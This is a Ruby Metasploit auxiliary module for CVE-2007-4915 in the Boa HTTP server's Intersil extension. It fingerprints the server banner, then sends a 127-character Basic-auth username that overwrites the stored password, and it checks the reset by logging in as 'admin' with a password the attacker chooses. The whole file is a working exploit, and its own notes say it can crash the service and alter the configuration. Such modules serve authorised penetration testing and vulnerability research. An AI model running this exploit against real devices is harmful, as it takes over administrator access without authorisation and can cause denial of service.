##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
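class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Banner pattern matched against the Server header; the capture is the
  # version string following "Boa/".
  BOA_BANNER = %r{Boa/(.*)}.freeze

  # Length of the random username sent in the first request.
  # NOTE(review): the module description says "greater than 127 bytes", while
  # the original code sends exactly 127 — confirm against the advisory before
  # changing either.
  LONG_USER_LENGTH = 127

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
        'Description' => %q{
          The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11
          allows basic authentication bypass when the user string is greater
          than 127 bytes long. The long string causes the password to be
          overwritten in memory, which enables the attacker to reset the
          password. In addition, the malicious attempt also may cause a
          denial-of-service condition.

          Please note that you must set the request URI to the directory that
          requires basic authentication in order to work properly.
        },
        'Author' => [
          'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', # original discoverer
          'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', # original discoverer
          'Max Dietz <maxwell.r.dietz[at]gmail.com>' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-4915' ],
          [ 'BID', '25676'],
          [ 'PACKETSTORM', '59347']
        ],
        'DisclosureDate' => '2007-09-10',
        'Notes' => {
          # The overflow can take the Boa process down, and both requests leave
          # an unusual (127-character alpha) username in the server's logs.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The request URI', '/']),
        OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
      ]
    )
  end

  # Fingerprints the target from the Server header of a GET on "/".
  #
  # The version test is the original character comparison: the first
  # character of the version must be '0' and the fourth at most '4'
  # (approximating the "0.93.x - 0.94.11" range from the description).
  # A missing Server header is no longer a NoMethodError, and a version
  # string too short to inspect is reported as Unknown instead of raising.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable, Safe or Unknown
  def check
    res = send_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })
    return Exploit::CheckCode::Unknown('No response from server') if res.nil?

    # `.to_s` guards against a missing Server header (nil.match would raise).
    m = res.headers['Server'].to_s.match(BOA_BANNER)
    return Exploit::CheckCode::Safe('Not a Boa Server!') unless m

    version = m[1]
    vprint_status("Boa Version Detected: #{version}")

    # The character checks below read version[0] and version[3]; anything
    # shorter than four characters cannot be classified this way.
    return Exploit::CheckCode::Unknown("Unrecognised Boa version string: #{version}") if version.length < 4
    return Exploit::CheckCode::Safe if version[0] > '0' # major version 1 or later
    return Exploit::CheckCode::Safe if version[3] > '4' # past the 0.94 line

    Exploit::CheckCode::Vulnerable
  rescue Rex::ConnectionRefused
    print_error('Connection refused by server.')
    Exploit::CheckCode::Safe
  end

  # Runs the check, then issues the long-username request against TARGETURI
  # and verifies the outcome with a second request as "admin".
  #
  # Only proceeds when +check+ reports Vulnerable; stops early when the
  # server does not answer or when TARGETURI is not protected by Basic auth.
  #
  # @return [void]
  def run
    return if check != Exploit::CheckCode::Vulnerable

    uri = normalize_uri(target_uri.path)
    # Do not mutate the string normalize_uri handed back; build a new one.
    uri += '/' unless uri.end_with?('/')

    res = fetch_with_basic_auth(uri, Rex::Text.rand_text_alpha(LONG_USER_LENGTH))
    if res.nil?
      print_error('The server may be down')
      return
    end

    # Anything other than 401 means the directory is not Basic-auth protected,
    # so there is no password to have been affected.
    if res.code != 401
      print_status("#{uri} does not have basic authentication enabled")
      return
    end

    print_status('Server still operational. Checking to see if password has been overwritten')
    res = fetch_with_basic_auth(uri, 'admin')
    unless res
      print_error('Server timed out, will not continue')
      return
    end

    report_outcome(res.code)
  end

  private

  # Sends a GET to +uri+ carrying Basic credentials for +user+ and the
  # configured PASSWORD.
  #
  # @param uri [String] normalized request path ending in '/'
  # @param user [String] username placed in the Authorization header
  # @return [Rex::Proto::Http::Response, nil] the response, or nil when none arrived
  def fetch_with_basic_auth(uri, user)
    send_request_cgi({
      'uri' => uri,
      'method' => 'GET',
      'authorization' => basic_auth(user, datastore['PASSWORD'])
    })
  end

  # Reports the result of the verification request.
  #
  # @param code [Integer] HTTP status code of the "admin" request
  # @return [void]
  def report_outcome(code)
    case code
    when 200
      print_good("Password reset successful with admin:#{datastore['PASSWORD']}")
    when 401
      print_error('Access forbidden. The password reset attempt did not work')
    else
      print_status("Unexpected response: Code #{code} encountered")
    end
  end
end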